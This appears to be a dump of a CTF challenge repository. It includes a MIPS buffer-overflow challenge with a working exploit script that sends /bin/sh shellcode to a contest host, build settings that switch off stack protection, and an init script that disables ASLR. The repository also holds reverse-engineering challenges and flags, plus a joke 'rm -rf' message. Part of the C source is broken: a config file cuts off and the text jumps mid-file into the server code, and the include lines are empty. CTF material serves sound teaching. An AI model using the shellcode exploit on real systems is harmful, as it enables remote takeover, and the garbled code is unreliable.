-------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/heapme -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/libc-2.23.so -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/server.crt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/server.crt -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/zip_hash.txt: -------------------------------------------------------------------------------- 1 | for_the_players.zip:$pkzip2$3*2*1*0*8*24*a581*7271*e5ed5be36292de737ff59bd8d1ba7581892ec1c7c5528bc0397249eacd21c574146bf975*1*0*8*24*1001*af37*a36c82814cf331ded22d10ff78f156bd326fc87906fff190bf70a2804b621cd8c53c7e46*2*0*90*a0*672aa752*0*41*8*90*672a*91d8*ce7244d566c77e15d95853848454d43b27bd785b9cb4f0cf35ba47bdcd164ae97f3d6ced2258c8503827169d8c41732a65c7cb9a4fa5f9233e939ab98e28df67123b81fc68d847786a73a63dc68796a9376995aa02bd523f1a4fd7777882deb36d270b360d63b1f73956248c611d88deb3a04cbd234b0a061bfe00e883979ebdb1f5f80c644bf71f6447fe7ccee34ef6*$/pkzip2$::for_the_players.zip:doc.txt, heapme, libc-2.23.so:for_the_players.zip 2 | -------------------------------------------------------------------------------- /CyberAfricaForum_2021/binary/babi_reverse: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/binary/babi_reverse -------------------------------------------------------------------------------- /CyberAfricaForum_2021/binary/calc_reverse: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/binary/calc_reverse -------------------------------------------------------------------------------- /CyberAfricaForum_2021/forensic/Security.evtx: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/forensic/Security.evtx -------------------------------------------------------------------------------- /CyberAfricaForum_2021/forensic/crack_me_if_you_can.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/forensic/crack_me_if_you_can.zip -------------------------------------------------------------------------------- /CyberAfricaForum_2021/forensic/gocryptfs_bruteforce.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/forensic/gocryptfs_bruteforce.zip -------------------------------------------------------------------------------- /CyberAfricaForum_2021/network/voip.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CyberAfricaForum_2021/network/voip.pcap -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ctf_challs 2 | All challenge I created for CTF 3 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | # docker run -p 4242:4242 --name ex --cap-add=SYS_PTRACE -v $PWD/chall:/chall --rm -it exploit bash 3 | EXPOSE 4242/tcp 4 | RUN apt-get update && apt-get install -y python3 python3-pip wget \ 5 | gdb valgrind git sudo vim 6 | # RUN apt-get install -y python python-pip wget && pip2 install --upgrade pip 7 | RUN apt-get 
install -y python python-pip wget 8 | RUN apt-get install -y e2tools qemu 9 | RUN pip2 install pwntools 10 | # RUN pip3 install --upgrade pip && pip3 install https://github.com/nongiach/arm_now/archive/master.zip 11 | # RUN apt-get install -y gcc-arm-linux-gnueabi 12 | RUN apt-get install -y gcc-mipsel-linux-gnu 13 | # RUN pip3 install --upgrade pip && pip3 install https://github.com/nongiach/arm_now/archive/master.zip 14 | RUN pip3 install https://github.com/nongiach/arm_now/archive/master.zip 15 | 16 | RUN arm_now install mips32el 17 | 18 | COPY ./chall /chall 19 | 20 | RUN cd /chall && ./post_install_mips.sh && \ 21 | rm post_install_mips.sh && \ 22 | rm inittab 23 | 24 | WORKDIR /chall 25 | RUN chmod 777 -R /chall 26 | 27 | RUN useradd tata 28 | USER tata 29 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/README.md: -------------------------------------------------------------------------------- 1 | # Easy_mips 2 | name: easy_mips 3 | 4 | desc: A basic stack buffer overflow on mips cpu. you are given the binary, the source code and the host:port. 5 | 6 | point: 400 and pwn 4 times 7 | 8 | ctf: https://breizhctf.com 9 | 10 | You can easily deploy the challenge by starting ./docker.sh, it will setup everything using docker. 11 | 12 | wait 30 secondes and you can connect to the port 4242. 13 | 14 | ```sh 15 | mipsel_breizh2k18 $ nc 127.0.0.1 4242 16 | BabyHttp brought to you by @chaign_c 17 | ``` 18 | 19 | tips: use arm_now tool to debug a mips program https://github.com/nongiach/arm_now 20 | 21 | Writeups: 22 | 23 | | Credit | link | 24 | | --- | --- | 25 | | [Aperikube](https://twitter.com/AperiKube) | http://www.aperikube.fr/docs/breizhctf_2018_mips/ | 26 | | [gov](https://twitter.com/govlog) | https://0bin.net/paste/TAOFEXebo71Lq6Es#VsAR6+5aqycYxg3C4YgQ1K5BjoUfUPayhEltlLWiBqi | 27 | 28 | ---- 29 | By [@chaign\_c][] [#HexpressoTeam][hexpresso]. 
30 | 31 | 32 | [hexpresso]: https://hexpresso.github.io 33 | [@chaign\_c]: https://twitter.com/chaign_c 34 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/README.txt: -------------------------------------------------------------------------------- 1 | ================================================================ 2 | ########## chall description 3 | ================================================================ 4 | Titre: arm_now them all 5 | Points: 250 6 | 7 | Host: METTRE HOST ICI, Port: 4242 8 | Download: ./vuln 9 | 10 | ================================================================ 11 | ########## note pour kaluche et saxx 12 | ================================================================ 13 | Demarrer le challenge comme suit: 14 | $ ./docker.sh 15 | ------------------------- 16 | 17 | Mettre a disposition des joueurs le port 4242 et le binaire ./vuln. 18 | Le flag est dans le chall et peut être reset avec le script ./regenerate_flag.sh 19 | ------------------------- 20 | 21 | Pour tester si le challenge est bien setup faire: 22 | $ nc host 4242 23 | BabyHttp brought to you by @chaign_c 24 | ------------------------- 25 | 26 | Pour tester si la vm est pwnable avec ma solution: 27 | $ docker exec -it ctf bash 28 | $ ./exploit.py 29 | $ cat flag 30 | ... 31 | ------------------------- 32 | 33 | Ceci est un challenge mipsel, exploit d'un stack overflow avec zero protection. 34 | Pas d'aslr, pas de ssp, pas de nx... 35 | Une erreur dans une pauvre boucle de urlencode, 36 | mais c'est un peu plus marrant a exploit qu'un strcpy. 37 | 38 | La vm mipsel va démarer est bind le port 4242 du host, 39 | ce port doit être accéssible aux joueurs. 40 | Ca sera leur seul vecteur d'attaque, ils auront également 41 | accès au binaire et au code source. 42 | 43 | Le docker doit être redémarré automatiquement toutes les 5 minutes, 44 | de cette manière elle reste clean. 
45 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/Makefile: -------------------------------------------------------------------------------- 1 | 2 | CC = mipsel-linux-gnu-gcc 3 | CFLAGS += -W -Wall -Wextra 4 | 5 | all: 6 | $(CC) main.c -o vuln -z execstack -static -fno-stack-protector 7 | 8 | clean: 9 | rm vuln 10 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/easy_mips.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/breizh2k18_easy_mips/chall/easy_mips.tar -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | 3 | import os 4 | import sys 5 | import pwn as p 6 | from pwnlib.util.cyclic import cyclic as cyclic 7 | 8 | # http://shell-storm.org/shellcode/files/shellcode-80.php 9 | shellcode = "\x50\x73\x06\x24"\ 10 | "\xff\xff\xd0\x04"\ 11 | "\x50\x73\x0f\x24"\ 12 | "\xff\xff\x06\x28"\ 13 | "\xe0\xff\xbd\x27"\ 14 | "\xd7\xff\x0f\x24"\ 15 | "\x27\x78\xe0\x01"\ 16 | "\x21\x20\xef\x03"\ 17 | "\xe8\xff\xa4\xaf"\ 18 | "\xec\xff\xa0\xaf"\ 19 | "\xe8\xff\xa5\x23"\ 20 | "\xab\x0f\x02\x24"\ 21 | "\x0c\x01\x01\x01"\ 22 | "/bin/sh\x00" 23 | 24 | nop = "\xff\xff\x06\x28" 25 | shellcode = nop * 100 + shellcode 26 | 27 | payload = b"GET %\x00A" 28 | pattern = bytearray(cyclic(1000)) 29 | 30 | read_buffer = 0x7fffe974 31 | shellcode_offset = 60 # must be a multple of 4 32 | shellcode_addr = read_buffer + shellcode_offset + 4 * 40 33 | pattern[36:40] = p.p32(shellcode_addr) 34 | pattern[41] = b"\x00" # end urldecode loop 35 | payload += pattern 36 | payload = bytearray(payload) 37 | 38 | payload[shellcode_offset:shellcode_offset+len(shellcode)] = shellcode 
39 | 40 | r = p.remote("breizhctf.serveur.io", 4242) 41 | r.send(payload) 42 | r.interactive() 43 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/flag: -------------------------------------------------------------------------------- 1 | b955c4e6aeffe3c63d2e922710323198 2 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/init.sh: -------------------------------------------------------------------------------- 1 | export PATH="$PATH:/opt/bin:/opt/sbin" 2 | 3 | cd /root 4 | which opkg || 5 | (sh install_pkg_manager.sh && 6 | opkg install ncat && 7 | poweroff -f) 8 | echo 0 > /proc/sys/kernel/randomize_va_space 9 | echo | adduser lamer 10 | chmod 000 * 11 | chmod +rx ./vuln . 12 | chmod +r flag 13 | ncat -k -l -p 4242 -c "su lamer -c ./vuln" 14 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/inittab: -------------------------------------------------------------------------------- 1 | # /etc/inittab 2 | # 3 | # Copyright (C) 2001 Erik Andersen 4 | # 5 | # Note: BusyBox init doesn't support runlevels. The runlevels field is 6 | # completely ignored by BusyBox init. If you want runlevels, use 7 | # sysvinit. 
# Format for each entry: <id>:<runlevels>:<action>:<process>
*dst++ = '\0'; 37 | } 38 | 39 | char not_found[] = "

The requested URL %s was not found on this server. That’s all we know.\n"; // sorry for the xss 40 | 41 | /* Handle one request buffer. Only "GET <path>" is answered: the encoded path must be shorter than url (32 bytes), is percent-decoded into that stack buffer and echoed through the not_found template. The length check bounds the encoded text, not urldecode's walk: a '%' in the last two bytes of the path makes urldecode step past the terminator and copy the bytes that follow in request into url, so the 32-byte buffer is not actually protected by this check. */ void handle_client(char request[]) { 42 | char url[32]; 43 | 44 | if (!strncmp(request, "GET ", 4)) { 45 | if (strlen(request + 4) < sizeof(url)) { /* guards the input length only; see note above */ 46 | urldecode(url, request + 4); 47 | printf(not_found, url); /* not_found is a fixed format string; url is its "%s" argument */ 48 | fflush(stdout); 49 | } 50 | } 51 | } 52 | 53 | /* Serve requests from stdin forever. The read() result is used unchecked: -1 on error is used as an index (request[-1] = 0) and 0 on EOF makes the loop spin re-handling the previous buffer. request is never cleared between reads, so bytes beyond the new terminator are leftovers of earlier, longer reads -- which is what urldecode can walk into. */ void baby_http() { 54 | char request[1024]; 55 | 56 | while (42) { 57 | int size = read(0, request, 1023); /* should reject size <= 0 before indexing */ 58 | request[size] = 0; 59 | handle_client(request); 60 | } 61 | } 62 | 63 | /* Entry point: print the banner and serve stdin; init.sh attaches stdin/stdout to a listening socket via ncat. */ int main() 64 | { 65 | printf("BabyHttp brought to you by @chaign_c\n"); 66 | fflush(stdout); 67 | baby_http(); 68 | return 0; 69 | } 70 | // what is arm_now ? 71 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/post_install_mips.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -i 2 | 3 | rm -rf arm_now 4 | cp /arm_now . -a 5 | e2rm ./arm_now/rootfs.ext2:/etc/inittab 6 | e2cp -G 0 -O 0 -P 555 ./inittab ./arm_now/rootfs.ext2:/etc/inittab 7 | arm_now start mips32el --sync --redir tcp:4242::4242 8 | cp arm_now /clean -a 9 | 10 | # rm -rf arm_now 11 | # cp /clean arm_now -a 12 | # arm_now start mips32el --sync --redir tcp:4242::4242 13 | 14 | # while [ true ] 15 | # do 16 | # timeout 30s arm_now start mips32el --sync --redir tcp:4242::4242 17 | # done 18 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/start_arm_now_mips.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -i 2 | 3 | arm_now start mips32el --sync --redir tcp:4242::4242 4 | 5 | # while [ true ] 6 | # for i in {0..10} 7 | # do 8 | # kill -s $(pgrep qemu-system-mipsel) 9 | # rm -rf arm_now 10 | # cp /clean arm_now -a 11 | # timeout 1m arm_now start mips32el --sync --redir tcp:4242::4242 12 | # reset 13 | # stty intr ^c 14 | # sleep 10s 15 | # 
done 16 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/chall/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/breizh2k18_easy_mips/chall/vuln -------------------------------------------------------------------------------- /breizh2k18_easy_mips/docker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | docker kill ctf 3 | docker build -t ctf . 4 | echo start ctf docker 5 | docker run -p 4242:4242/tcp -d --name ctf --rm -it ctf bash -i /chall/start_arm_now_mips.sh 6 | # docker run -v $PWD/chall:/chall -p 4242:4242/tcp -d --name ctf --rm -it ctf bash -i /chall/start_arm_now_mips.sh 7 | # docker kill ctf 8 | -------------------------------------------------------------------------------- /breizh2k18_easy_mips/regenerate_flag.sh: -------------------------------------------------------------------------------- 1 | dd if=/dev/urandom bs=32 count=1 | md5sum | cut -d ' ' -f 1 > chall/flag 2 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/.gdb_history: -------------------------------------------------------------------------------- 1 | b runtime.cmpstring 2 | r 3 | b runtime.cmpstring 4 | r 5 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | go build 3 | 4 | clean: 5 | rm gogo 6 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/flag.txt: -------------------------------------------------------------------------------- 1 | BREIZHCTF{Le_monde_est_un_jeu_de_go_dont_les_regles_ont_ete_inutilement_compliquees} 2 | 
-------------------------------------------------------------------------------- /breizh2k19/go_reverse/gogo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/breizh2k19/go_reverse/gogo -------------------------------------------------------------------------------- /breizh2k19/go_reverse/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/md5" 5 | "encoding/hex" 6 | "bufio" 7 | "fmt" 8 | "os" 9 | "strings" 10 | ) 11 | 12 | func GetMD5Hash(text string) string { 13 | hasher := md5.New() 14 | hasher.Write([]byte(text)) 15 | return hex.EncodeToString(hasher.Sum(nil))[:4] 16 | } 17 | 18 | func hash_password(password string) string { 19 | var hashed_password strings.Builder 20 | for i := 0; i+2 <= len(password); i += 2 { 21 | var password_slice string = password[i:i+2] 22 | hashed_password.WriteString(GetMD5Hash(password_slice)) 23 | } 24 | return hashed_password.String() 25 | } 26 | 27 | func process_password() { 28 | fmt.Print("Password:") 29 | reader := bufio.NewReader(os.Stdin) 30 | password, _ := reader.ReadString('\n') 31 | password = strings.Replace(password, "\n", "", -1) 32 | // fmt.Println(hash_password(password)) 33 | if strings.Compare("19d355de2f36112c6489bccdb781ed2b5f023177627f3b5e8054795654055f0213e9b8aad457259337c9124736462a6ad9182c3bed2b33d84de1bfbe13b5b1a5460547e29cfe33d8ab6c1f2dd70c0e2a08a4b5c7", hash_password(password)) == 0 { 34 | fmt.Println("Well Done") 35 | } else { 36 | fmt.Println("Shame on you, you deserve a rm -rf --no-preserve-root /") 37 | } 38 | 39 | } 40 | 41 | func main() { 42 | fmt.Println("WARNING: This program is very dangerous do not run it on a production system!!") 43 | fmt.Println("Please snapshot your vm before continuing.") 44 | fmt.Println("Do you want to continue? 
(yes/no)?") 45 | reader := bufio.NewReader(os.Stdin) 46 | text, _ := reader.ReadString('\n') 47 | 48 | if strings.Compare("yes\n", text) == 0 { 49 | process_password() 50 | } else { 51 | fmt.Println("Exiting... Don't worry I only delete one file this time."); 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/peda-session-gogo.txt: -------------------------------------------------------------------------------- 1 | break runtime.cmpstring 2 | 3 | -------------------------------------------------------------------------------- /breizh2k19/go_reverse/solution.txt: -------------------------------------------------------------------------------- 1 | voir qu'il s'agit d'un binaire go non strippé. 2 | nm binaire | grep cmp 3 | mettre un breakpoint dans la fonction "runtime.cmpstring". 4 | 5 | b runtime.cmpstring 6 | on voit la string avec laquelle la comparaison est faite. 7 | On se rend vite compte que les caractères sont hashés 2 par 2. 8 | hash(deux caractères ab) => md5(ab)[:2] 9 | solution 1: faire un dico de toutes les possibilités de hash. (65535 possibilités, 32639 si on ne prend que ce qui est affichable) 10 | solution 2: bf les caractères deux par deux. 
11 | -------------------------------------------------------------------------------- /breizh2k19/reverse_ppc/generate_flag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/breizh2k19/reverse_ppc/generate_flag -------------------------------------------------------------------------------- /breizh2k19/reverse_ppc/generate_flag.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | typedef unsigned long int u4; /* NOTE: unsigned long is 64-bit on LP64 targets such as the powerpc64 toolchain named in main(); rot() below assumes a 32-bit word, so the generator and main.c only agree when built for the same ABI. uint32_t would pin the width. */ 7 | typedef struct ranctx { u4 a; u4 b; u4 c; u4 d; } ranctx; 8 | 9 | #define rot(x,k) (((x)<<(k))|((x)>>(32-(k)))) /* rotate within a 32-bit word; only k = 27 and 17 are used */ 10 | /* One step of the generator (looks like Jenkins' small noncryptographic PRNG; the seed is a fixed constant, so the output is fully reproducible and carries no secrecy). */ u4 ranval( ranctx *x ) { 11 | u4 e = x->a - rot(x->b, 27); 12 | x->a = x->b ^ rot(x->c, 17); 13 | x->b = x->c + x->d; 14 | x->c = x->d + e; 15 | x->d = e + x->a; 16 | return x->d; 17 | } 18 | 19 | /* Seed the state and discard the first 20 outputs. */ void raninit( ranctx *x, u4 seed ) { 20 | u4 i; 21 | x->a = 0xf1ea5eec, x->b = x->c = x->d = seed; 22 | for (i=0; i<20; ++i) { 23 | (void)ranval(x); 24 | } 25 | } 26 | 27 | 28 | /* Fill transpose[256] with a seeded byte substitution and ntranspose with its inverse. The XOR swap zeroes transpose[i] whenever v == i, so the table is not guaranteed to be a permutation (and the inverse fill then loses entries); that quirk is identical in main.c since both use the same seed. Declared unsigned int but never returns a value -- should be void. */ unsigned int init_transpose(ranctx *state, unsigned int *transpose, unsigned int *ntranspose) { 29 | for (unsigned int i = 0; i < 256; i++) { 30 | transpose[i] = i; 31 | ntranspose[i] = i; 32 | } 33 | for (unsigned int i = 0; i < 256; i++) { 34 | unsigned int v = ranval(state) % 256; 35 | transpose[i] = transpose[i] ^ transpose[v]; /* XOR swap: when v == i this leaves 0 */ 36 | transpose[v] = transpose[i] ^ transpose[v]; 37 | transpose[i] = transpose[i] ^ transpose[v]; 38 | } 39 | for (unsigned int i = 0; i < 256; i++) { 40 | ntranspose[transpose[i]] = i; 41 | } 42 | } 43 | 44 | /* Substitute every byte of s in place through transpose, up to the first NUL. A table entry of 0 embeds a NUL in the result. */ void do_transpose(unsigned char *s, unsigned int *transpose) { 45 | for (unsigned int i = 0; s[i]; i++) { 46 | /* printf("%u => %u, %c => %c\n", */ 47 | /* s[i], transpose[s[i]], */ 48 | /* s[i], transpose[s[i]]); */ 49 | s[i] = transpose[s[i]]; 50 | } 51 | } 52 | 53 | /* Print the bytes of s as a comma-separated decimal list terminated by 0 -- the form pasted into main.c's flag[] initializer. */ void do_print(unsigned char *s) { 54 | /* printf("%s\n", 
s); */ 55 | for (unsigned int i = 0; s[i]; i++) { 56 | printf("%u,", s[i]); 57 | } 58 | printf("0"); 59 | printf("\n"); 60 | } 61 | 62 | /* Usage: generate_flag <plaintext>. Encodes av[1] in place with the seeded table and prints the encoded bytes. */ int main(int ac, char **av) { 63 | // apt install gcc-7-powerpc64-linux-gnu 64 | // powerpc64-linux-gnu-gcc-7 main.c -o ppc 65 | if (ac == 1) { 66 | printf("Usage: ./generate_flag flag\n"); 67 | exit(1); 68 | } 69 | ranctx state; 70 | raninit(&state, 0x378687); /* must match the seed in main.c */ 71 | 72 | unsigned int transpose[256] = {0}; 73 | unsigned int r_transpose[256] = {0}; 74 | init_transpose(&state, transpose, r_transpose); 75 | 76 | /* unsigned char flag[] = "Br{ThisIsTheFuckingFlag}"; */ 77 | unsigned char *flag = av[1]; 78 | /* unsigned char flag[] = {219,135,32,124,200,124,219,135,62,142,118,69,74,32,149,37,142,44,157,37, 0}; */ 79 | /* unsigned char input[256]; */ 80 | /* write(1, "Password: ", 10); */ 81 | /* int read_ret = read(0, input, 256); */ 82 | /* input[read_ret - 1] = 0; */ 83 | do_transpose(flag, transpose); 84 | do_print(flag); 85 | /* if (strcmp(input, flag) == 0) { */ 86 | /* printf("Good job, @chaignc is proud of you\n"); */ 87 | /* } else { */ 88 | /* printf("Bad password\n"); */ 89 | /* } */ 90 | return 0; 91 | } 92 | -------------------------------------------------------------------------------- /breizh2k19/reverse_ppc/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | typedef unsigned long int u4; /* NOTE: 64-bit on LP64 targets; rot() assumes 32 bits -- keep the same ABI as generate_flag.c */ 6 | typedef struct ranctx { u4 a; u4 b; u4 c; u4 d; } ranctx; 7 | 8 | #define rot(x,k) (((x)<<(k))|((x)>>(32-(k)))) 9 | /* Generator step; identical to generate_flag.c. */ u4 ranval( ranctx *x ) { 10 | u4 e = x->a - rot(x->b, 27); 11 | x->a = x->b ^ rot(x->c, 17); 12 | x->b = x->c + x->d; 13 | x->c = x->d + e; 14 | x->d = e + x->a; 15 | return x->d; 16 | } 17 | 18 | /* Seed the state and discard the first 20 outputs. */ void raninit( ranctx *x, u4 seed ) { 19 | u4 i; 20 | x->a = 0xf1ea5eec, x->b = x->c = x->d = seed; 21 | for (i=0; i<20; ++i) { 22 | (void)ranval(x); 23 | } 24 | } 25 | 26 | unsigned int init_transpose(ranctx *state, unsigned int *transpose, 
unsigned int *ntranspose) { /* Fill transpose[256] with the seeded byte substitution; ntranspose is only set to the identity here (the inverse fill is commented out). The XOR swap below zeroes transpose[i] whenever v == i, so the table is not guaranteed to be a permutation. The signature above declares unsigned int but nothing is returned -- should be void. */ 27 | for (unsigned int i = 0; i < 256; i++) { 28 | transpose[i] = i; 29 | ntranspose[i] = i; 30 | } 31 | for (unsigned int i = 0; i < 256; i++) { 32 | unsigned int v = ranval(state) % 256; 33 | transpose[i] = transpose[i] ^ transpose[v]; /* XOR swap: when v == i this leaves 0 */ 34 | transpose[v] = transpose[i] ^ transpose[v]; 35 | transpose[i] = transpose[i] ^ transpose[v]; 36 | } 37 | /* for (unsigned int i = 0; i < 256; i++) { */ 38 | /* ntranspose[transpose[i]] = i; */ 39 | /* } */ 40 | } 41 | 42 | /* Substitute every byte of s in place through transpose, up to the first NUL. A table entry of 0 embeds a NUL in the result, which strcmp in main then treats as the end of the string. */ void do_transpose(unsigned char *s, unsigned int *transpose) { 43 | for (unsigned int i = 0; s[i]; i++) { 44 | /* printf("%u => %u, %c => %c\n", */ 45 | /* s[i], transpose[s[i]], */ 46 | /* s[i], transpose[s[i]]); */ 47 | s[i] = transpose[s[i]]; 48 | } 49 | } 50 | 51 | /* Debug helper (unused in main): print s raw, then as a comma-separated decimal byte list. */ void do_print(unsigned char *s) { 52 | printf("%s\n", s); 53 | for (unsigned int i = 0; s[i]; i++) { 54 | printf("%u,", s[i]); 55 | } 56 | printf("\n"); 57 | } 58 | 59 | /* Read a password from stdin, encode it with the seeded table and compare it byte-for-byte against the stored encoded flag. */ int main() { 60 | // apt install gcc-8-powerpc64-linux-gnu 61 | // powerpc64-linux-gnu-gcc-8 main.c -o sh 62 | ranctx state; 63 | raninit(&state, 0x378687); /* same fixed seed as generate_flag.c, so the table is reproducible by anyone with this source */ 64 | 65 | unsigned int transpose[256] = {0}; 66 | unsigned int r_transpose[256] = {0}; 67 | init_transpose(&state, transpose, r_transpose); 68 | 69 | /* unsigned char flag[] = "ThisIsTheFuckingFlag"; */ 70 | /* unsigned char flag[] = {219,135,32,124,200,124,219,135,62,142,118,69,74,32,149,37,142,44,157,37, 0}; */ 71 | /* unsigned char flag[] = {221,227,173,160,219,142,134,0}; // "Br{CTF}" */ 72 | unsigned char flag[] = {221,23,138,200,119,117,160,219,142,173,160,62,118,203,144,34,118,32,144,118,225,32,44,32,124,62,149,225,144,157,227,12,144,149,170,175,144,37,157,37,149,62,149,225,144,166,118,144,225,62,12,78,124,134,0}; 73 | unsigned char input[256]; 74 | write(1, "Password: ", 10); 75 | int read_ret = read(0, input, 256); /* result unchecked: 0 (EOF) or -1 makes the next line write input[-1]; it also assumes the last byte read is a newline to strip */ 76 | input[read_ret - 1] = 0; 77 | do_transpose(input, transpose); 78 | if (strcmp(input, flag) == 0) { /* unsigned char* passed where char* is expected -- pointer-sign warning */ 79 | printf("Good job, @chaignc is proud of you\n"); 80 | } else { 81 
| printf("Bad password\n"); 82 | } 83 | return 0; 84 | } 85 | -------------------------------------------------------------------------------- /breizh2k19/reverse_ppc/sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/breizh2k19/reverse_ppc/sh --------------------------------------------------------------------------------